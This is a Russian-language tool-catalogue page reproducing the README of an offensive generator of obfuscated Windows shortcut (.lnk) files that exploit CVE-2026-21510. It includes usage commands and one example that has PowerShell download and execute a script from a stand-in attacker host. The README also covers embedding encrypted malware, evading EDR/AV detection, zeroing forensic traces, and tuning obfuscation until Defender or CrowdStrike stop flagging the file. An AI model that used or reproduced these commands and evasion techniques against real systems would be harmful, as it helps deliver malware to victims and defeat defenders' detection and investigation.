Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/epsilonpointori/epsilonpointlnk
ЭксплуатацияЭксплуатация веб-приложенийАнализ вредоносных программТестирование на ПроникновениеRed TeamingРазработка Полезной НагрузкиАнти-Бот
GitHub
epsilonpointori/epsilonpointlnk

EpSiLoNPoInTlnk

Генерирует обфусцированные .lnk-файлы, эксплуатирующие CVE-2026-21510 с помощью LNK stomping, зашифрованных полезных нагрузок и методов анти-форензики для авторизованного тестирования на проникновение и операций red team.

Репозиторий
2255 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

README EpSiLoNPoInTlnk CVE-2026-21510 - Генератор .LNK Инструмент для генерации файлов .lnk с использованием уязвимости CVE-2026-21510 (Windows ShellLink Remote Code Execution). Предназначен для исследований в области безопасности, авторизованных тестов на проникновение и анализа уязвимостей.

Юридическое предупреждение ⚠️ ЭТОТ ИНСТРУМЕНТ ПРЕДНАЗНАЧЕН ТОЛЬКО ДЛЯ ЛЕГАЛЬНОГО И АВТОРИЗОВАННОГО ИСПОЛЬЗОВАНИЯ. Любое несанкционированное использование против систем или сетей нарушит местные и международные законы (например, Computer Fraud and Abuse Act (CFAA), GDPR, закон Годфрена во Франции). Автор снимает с себя всякую ответственность в случае неправомерного использования. (См. Отказ от ответственности ниже.)

Описание Этот генератор создает обфусцированные файлы .lnk для использования CVE-2026-21510, уязвимости в обработке ярлыков Windows. Он включает:

LNK Stomping (5 вариантов: dot, path_segment, relative, double_extension, unicode)

PropertyStore со случайными CLSID и PKEY

KnownFolderDataBlock (случайные или целевые KnownFolderID)

EnvironmentVariableDataBlock (обфускация Unicode, динамические переменные)

Обфускация (Уровни 1-5: TrackerDataBlock, ConsoleDataBlock, случайные блоки)

Встроенные и зашифрованные полезные нагрузки (AES-256-CBC + XOR)

Анти-форензика (нулевые временные метки, нулевой размер файла, минимальные метаданные)

Обход EDR/AV (легитимные процессы, обфусцированные аргументы PowerShell)

Генерация случайных вариантов (10+ уникальных вариантов для обхода сигнатур)

Предварительные требования Система ОС: Windows (для тестирования сгенерированных .lnk) или Linux/macOS (для генерации).

Python: ≥ 3.10. Зависимости: pip install pycryptodome

Рекомендуемые инструменты Анализ: PEStudio, Detect It Easy (DIE)

Отладка: x64dbg, WinDbg

Тестирование: Изолированная виртуальная машина Windows (например, Windows 10/11 на VirtualBox).

Установка Клонировать репозиторий: git clone https://github.com/EpSiLoNPoInT/EpSiLoNPoInTlnk.git cd EpSiLoNPoInTlnk Установить зависимости: pip install -r requirements.txt (Необязательно) Создать виртуальное окружение: python -m venv venv source venv/bin/activate # Linux/macOS venv\Scripts\activate # Windows

Использование

  1. Базовая генерация python lnkstomperpoint.py --target "C:\Windows\System32\cmd.exe" --args "/c calc.exe" --output exploit.lnk Генерирует .lnk с использованием CVE-2026-21510 для запуска calc.exe.

  2. Расширенные параметры Параметр Описание Значение по умолчанию --target Целевой путь (например: C:\Windows\System32\cmd.exe) C:\Windows\System32\cmd.exe --args Аргументы для цели (например: /c whoami) /c calc.exe --output Путь вывода .lnk ./EpSiLoNPoInTlnk_[TIMESTAMP].lnk --working-dir Рабочий каталог C:\Windows\System32 --description Описание ярлыка Случайная строка --unc Использовать UNC-путь (?\C:...) False --lnk-stomping Включить LNK Stomping True --stomping-variant Вариант LNK Stomping (dot, path_segment, relative, double_extension, unicode, random) random --obfuscation Добавить бесполезные блоки ExtraData True --obfuscation-level Уровень обфускации (1-5) 5 --embed-payload Путь к файлу для встраивания (например: payload.bin) None --encrypt-payload Зашифровать полезную нагрузку (AES-256-CBC + XOR) True --anti-forensics Применить методы анти-форензики True --randomize-clsid Рандомизировать CLSID в PropertyStore True --randomize-known-folder Рандомизировать KnownFolderID True --obfuscate-arguments Обфусцировать аргументы (PowerShell) True --generate-variants Сгенерировать N случайных вариантов 0 --debug Расширенный режим отладки (подробные логи) False

  3. Примеры Пример 1: Эксплойт со встроенной полезной нагрузкой python lnkstomperpoint.py
    --target "C:\Windows\System32\cmd.exe"
    --args "/c payload.exe"
    --embed-payload ./malware.bin
    --output exploit_with_payload.lnk
    --obfuscation-level 5
    --anti-forensics Генерирует .lnk с зашифрованной (AES-256 + XOR) и обфусцированной полезной нагрузкой.

Пример 2: Генерация 10 случайных вариантов python lnkstomperpoint.py
--target "C:\Windows\System32\powershell.exe"
--args "-nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/shellcode.ps1')"
--generate-variants 10
--output-dir ./variants Создает 10 уникальных вариантов для обхода сигнатур EDR/AV.

Пример 3: Минималистичный режим (для тестов) python lnkstomperpoint.py
--target "C:\Windows\System32\notepad.exe"
--obfuscation False
--anti-forensics False
--output minimal_exploit.lnk Генерирует необфусцированный .lnk (для анализа или отладки).

Техническое функционирование

  1. Структура .LNK Сгенерированный файл .lnk соответствует спецификации MS-SHLLINK со следующими расширениями:

Заголовок ShellLink (0x4C фиксированных байт + смещения): LinkCLSID: 00021401-0000-0000-C000-000000000046 (обязательно). LinkFlags: Настроен для активации HasRelativePath, HasWorkingDir, IsUnicode и т.д.

StringData: RelativePath: Целевой путь (с LNK Stomping, если включен). WorkingDir: Рабочий каталог (например: C:\Windows\System32). Arguments: Обфусцированные аргументы (PowerShell, cmd и т.д.).

Блоки ExtraData (критический порядок): PropertyStoreDataBlock: Содержит PKEY_AppUserModel_ID (случайный CLSID). KnownFolderDataBlock: Указывает на системную папку (например: %SystemRoot%). EnvironmentVariableDataBlock: Принудительное раскрытие переменных до Mark-of-the-Web (MotW). Блоки обфускации (в зависимости от obfuscation_level): TrackerDataBlock (Уровень 1) ConsoleDataBlock (Уровень 2) DarwinDataBlock, ShimDataBlock и т.д. (Уровни 3-5)

Встроенная полезная нагрузка (если --embed-payload): Зашифрована с помощью AES-256-CBC + XOR.

  1. Методы обхода Метод Описание Воздействие LNK Stomping Добавляет невидимые символы (., , \u202e) к целевому пути. Обходит обнаружения на основе сигнатур путей. PropertyStore Использует PKEY со случайными CLSID для обхода сигнатур. Избегает правил YARA/EDR, нацеленных на известные CLSID. KnownFolder Указывает на системные папки (%SystemRoot%, %Temp%). Обходит ограничения абсолютных путей. EnvironmentVariable Обфусцирует путь с помощью переменных (%TEMP%, %APPDATA%). Избегает статических обнаружений. Обфускация Уровень 5 Добавляет случайные блоки ExtraData и заполнение. Затрудняет статический анализ. Анти-форензика Обнуляет временные метки, размер файла и т.д. Затрудняет форензический анализ. Обфусцированные аргументы Использует методы PowerShell (Base64, XOR, Reverse). Обходит обнаружения вредоносных команд.
  2. Шифрование полезной нагрузки Если --embed-payload включен:

Полезная нагрузка шифруется с помощью AES-256-CBC (случайный ключ 32 байта, IV 16 байт).

Применяется слой XOR с первыми 16 байтами ключа AES.

Ключ и IV хранятся в ShimDataBlock для последующей расшифровки.

Тесты и валидация

  1. Автоматическая валидация Генератор включает функцию _validate(), которая проверяет:

Минимальный размер файла.

Действительность HeaderSize и CLSID.

Наличие требуемых LinkFlags.

Структуру блоков ExtraData (PropertyStore, KnownFolder и т.д.).

  1. Ручные тесты Статический анализ: Используйте PEStudio для проверки структуры .lnk. Убедитесь, что блоки ExtraData присутствуют.

Выполнение (в изолированной среде): Дважды щелкните по .lnk и наблюдайте за поведением. Используйте Process Monitor (ProcMon) для анализа системных вызовов.

Обнаружение EDR/AV: Протестируйте с помощью таких инструментов, как Windows Defender или CrowdStrike. Если .lnk обнаружен, увеличьте obfuscation_level или отключите некоторые параметры.

Скачать инструмент